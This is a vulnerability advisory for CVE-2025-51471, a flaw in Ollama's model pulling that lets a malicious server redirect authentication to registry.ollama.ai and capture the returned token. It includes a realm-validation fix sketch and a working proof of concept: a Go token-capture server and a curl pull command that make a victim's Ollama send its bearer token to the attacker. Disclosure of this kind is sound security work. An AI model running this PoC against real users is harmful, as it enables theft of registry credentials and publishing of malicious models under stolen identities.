CVE-2025-51471: Ollama Cross-Domain Authentication Token Exposure

May 16, 2025 by Gecko Security Research · Medium 6.9

Authentication flow vulnerability in Ollama's model pulling mechanism allowing cross-domain token redirection and theft.


Original finding credits:

Below is our duplicate finding. Edit made on October 13th, 2025.


Description

Ollama's authentication flow contains a vulnerability in its model pulling mechanism. When a user pulls a model from an HTTPS server that responds with a 401 Unauthorized status, Ollama follows the WWW-Authenticate header's realm URL without validating if it belongs to the same domain as the original request. This allows an attacker to redirect the authentication flow to any domain, including registry.ollama.ai, and capture valid authentication tokens.

The issue exists in the authentication challenge handling logic, where Ollama does not verify that the authentication realm in the WWW-Authenticate header is from the same domain as the initial request. This enables cross-domain authentication flow redirection and token stealing.
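The missing check can be sketched as follows. This is an added example, not Ollama's code or its actual fix: `validateRealm` is a hypothetical helper, and the request URLs in `main` are constructed for illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// challengeParam matches key="value" pairs in a WWW-Authenticate challenge.
var challengeParam = regexp.MustCompile(`(\w+)="([^"]*)"`)

// validateRealm (hypothetical helper, not Ollama's code) returns the challenge's
// realm URL only when it is https and on the same host:port as the 401'd request.
func validateRealm(requestURL, header string) (*url.URL, error) {
	req, err := url.Parse(requestURL)
	if err != nil || req.Host == "" {
		return nil, fmt.Errorf("invalid request URL %q", requestURL)
	}
	scheme, rest, ok := strings.Cut(strings.TrimSpace(header), " ")
	if !ok || !strings.EqualFold(scheme, "Bearer") {
		return nil, fmt.Errorf("not a Bearer challenge")
	}
	params := map[string]string{}
	for _, m := range challengeParam.FindAllStringSubmatch(rest, -1) {
		params[strings.ToLower(m[1])] = m[2]
	}
	realm, err := url.Parse(params["realm"])
	if err != nil || realm.Host == "" {
		return nil, fmt.Errorf("missing or invalid realm")
	}
	if realm.Scheme != "https" {
		return nil, fmt.Errorf("realm scheme %q is not https", realm.Scheme)
	}
	// Exact host:port match; anything else fails closed.
	if !strings.EqualFold(realm.Host, req.Host) {
		return nil, fmt.Errorf("realm host %q does not match request host %q", realm.Host, req.Host)
	}
	return realm, nil
}

func main() {
	// Constructed inputs: the challenge string is the one served by the PoC on this page.
	poc := `Bearer realm="https://registry.ollama.ai/v2/token",service="ollama",scope="-"`
	_, err := validateRealm("http://127.0.0.1:8000/v2/library/example/manifests/latest", poc)
	fmt.Println("cross-host realm:", err)
	realm, err := validateRealm("https://registry.ollama.ai/v2/library/example/manifests/latest", poc)
	fmt.Println("same-host realm:", realm, err)
}
```

A client that must support registries whose token service runs on a different host would need an explicit per-registry allowlist instead of a strict same-host comparison.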

Proof of Concept

This PoC demonstrates how an attacker can steal valid registry.ollama.ai authentication tokens:

  1. Start the Ollama server:

```bash
go run main.go serve
```

  2. Create the token-capture server (token_capture.go):

```go
package main

import (
    "fmt"
    "log"
    "net/http"
)

func main() {
    http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
        fmt.Printf("Request: %s %s\n", r.Method, r.URL.String())

        // First request carries no credentials: answer 401 with a challenge
        // whose realm points at the registry.ollama.ai token endpoint.
        if r.Header.Get("Authorization") == "" {
            w.Header().Set("WWW-Authenticate", `Bearer realm="https://registry.ollama.ai/v2/token",service="ollama",scope="-"`)
            w.WriteHeader(http.StatusUnauthorized)
            w.Write([]byte("Unauthorized"))
            return
        }

        // The retried request carries the token obtained from that realm.
        fmt.Printf("STOLEN TOKEN: %s\n", r.Header.Get("Authorization"))
        w.WriteHeader(http.StatusTeapot)
        w.Write([]byte("Token captured"))
    })

    log.Fatal(http.ListenAndServe(":8000", nil))
}
```

  3. Run the token capture server:

```bash
go run token_capture.go
```

  4. Trigger the vulnerability:

```bash
curl http://localhost:11434/api/pull -d '{
  "model": "http://127.0.0.1:8000/{model}"
}'
```

  5. Observe the stolen token in the server output.

Impact

This vulnerability allows attackers to:

  • Steal authentication tokens for registry.ollama.ai by tricking users into pulling models from malicious servers
  • Access private models the user has permission to access in the registry
  • Push malicious models under the victim's identity if they have write access

Product

Ollama

Vendor

Ollama

Version

0.6.7

CVSS

6.9
